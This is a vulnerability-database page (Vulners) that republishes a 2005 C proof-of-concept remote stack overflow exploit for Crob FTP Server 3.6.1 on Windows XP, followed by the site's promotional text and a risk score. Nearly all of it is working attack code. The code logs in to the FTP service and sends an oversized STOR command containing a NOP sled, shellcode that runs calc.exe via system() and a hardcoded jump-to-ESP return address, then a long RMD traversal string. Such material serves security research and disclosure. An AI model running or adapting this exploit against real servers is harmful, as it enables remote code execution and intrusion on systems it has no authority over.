Vulners
Lucene search
Crob FTP Server <= 3.6.1 Remote Stack Overflow Exploit
/*
* CrobFTP remote stack overflow PoC
* ---------------------------------
* Tested on Crob FTP Server 3.6.1, Windows XP
*
* Coded by Leon Juranic <[email protected]>
* LSS Security / http://security.lss.hr
*
*/
#include <stdio.h>
#include <windows.h>
#include <time.h>
#pragma comment (lib,"ws2_32")
char *fzz_recv (int sock)
{
fd_set fds;
struct timeval tv;
static char buf[10000];
char *ptr=buf;
int n;
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock,&fds);
if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
buf[n-1] = '\0';
printf ("RECV: %s\n",buf);
return buf;
}
else {
return NULL;
}
}
int login (int sock, char *user, char *pass)
{
char buf[1024], *bla;
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
sprintf (buf,"USER %s\r\n",user);
send (sock,buf,strlen(buf),0);
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
sprintf (buf,"PASS %s\r\n",pass);
send (sock,buf,strlen(buf),0);
bla=fzz_recv(sock);
printf ("recv: %s\n",bla);
if (strcmp("230",bla) != NULL)
return 0;
else return -1;
return 0;
}
void lame_sploit (char *pack, char *user, char *pass)
{
WORD wVersionRequested;
WSADATA wsaData;
int sock, err,x;
struct sockaddr_in sin;
char buf[2000],tmp[1000];
char *shell= // 5 min. XP SP1 shellcode
"\x33\xc0" // xor eax,eax
"\x50" // push eax (\0)
"\x68\x2e\x65\x78\x65" // push '.exe'
"\x68\x63\x61\x6c\x63" // push 'calc'
"\x54" // push esp
"\xba\x44\x80\xc2\x77" // mov edx, 77c28044
"\xff\xd2"; // call edx (system)
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf ("ERROR: Sorry, cannot create socket!!!\n");
ExitProcess(-1);
}
sock=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(pack);
sin.sin_port = htons(21);
if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
printf ("CONNECT :(((\n");
ExitProcess(-1);
}
if (login(sock,user,pass) == -1)
{
printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
exit(-1);
}
memset(tmp,0,sizeof(tmp));
memset (tmp,0x90,180);
memcpy (&tmp[80],shell,strlen(shell));
*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
*(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74
*(long*)&tmp[170] = 0x9090e4ff; // jmp esp
_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);
printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
send (sock,buf,strlen(buf),0);
printf ("%s\n",fzz_recv(sock));
strcpy(buf,"RMD ");
for (x=0;x<276;x++)
strcat (buf,".../");
strcat(buf,"\r\n");
printf ("Sending exploit strings\n");
send (sock,buf,strlen(buf),0);
printf ("recv: %s\n",fzz_recv(sock));
}
main (int argc, char **argv)
{
printf ("CrobFTP Stack overflow PoC \n"
"Coded by Leon Juranic <[email protected]>\n"
"LSS Security / http://security.lss.hr/\n");
if (argc < 4 ) {
printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);
exit(-1);
}
lame_sploit(argv[1],argv[2],argv[3]);
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2005 00:00Current
7.1High risk
Vulners AI Score7.1